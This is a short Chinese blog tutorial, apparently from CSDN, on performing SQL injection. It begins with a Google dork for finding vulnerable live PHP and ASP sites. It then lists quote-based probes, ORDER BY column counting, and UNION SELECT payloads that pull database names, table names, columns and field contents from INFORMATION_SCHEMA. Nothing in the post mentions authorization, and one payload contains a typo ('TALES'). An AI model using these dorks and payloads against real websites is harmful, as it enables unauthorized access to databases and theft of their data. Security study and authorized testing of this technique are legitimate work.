sql注入简单流程(会继续更新)

简单的介绍一下流程

思想:有SQL的网站肯定是与数据库有交互,即用户输入的参数可以进入网站后台数据库查询
一.搜索寻找可能存在漏洞的网站
inurl:.php?id=(or)inurl:.asp?id=
注:这里用到了googlehacking 查询 不了解可以百度一下或者看看上一篇文章关于Googlehacking
https://blog.csdn.net/qq_46091464/article/details/105254770

二.进行手工注入测试

’ %23
’ )%23
’ and 1=2%23
" and 1=2%23

三.进行发现字段
order by

四.进行union查询

union select user(),database(),version(),...%23

注:查询的内容必须与字段数保存一致
即:字段数如果是5 查询的内容必须的5个内容

五.判断数据库版本
即默认数据库5.0以上的满足
Information_SCHEMA()(all库名)
TABLE_NAME (all表名)
COLUMN_NAME(all列名)

六.进行暴破数据库

' union select 1,1,1,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES#
' union select 1,1,1,group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES# (where table_schema=database())
' union select 1,1,1,group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.columns#   (where table_name=XXX)(可能用16进制绕过0x....)

最后:暴破字段

' union select 1,1,1,字段 from 表名#

特别提醒:在暴破数据库的时候前面的参数需要改变一下(如果?id=1 )需要将id=1改变成一个不存在的数字(就是数据库里面没有这个数字)
如:id=-1 或者在id=1后面添加and 1=2,让前面错误,这样才可以满足字段数。

七.遇到了字段数特别少怎么一次性查询?
用concat()函数

union select concat(database(),' ',version()) TABLE_SCHEMA from INFORMATION_SCHEMA.TALES#

下一篇 将会深入了解sqlmap工具的使用 和不同版本数据库的SQL注入
或者是 操作实战 SQL注入。
如果文章有错误希望朋友们指出_!
喜欢你们喜欢~(大佬绕过 小白不喜勿喷)

你可能感兴趣的:(笔记,sql,mysql)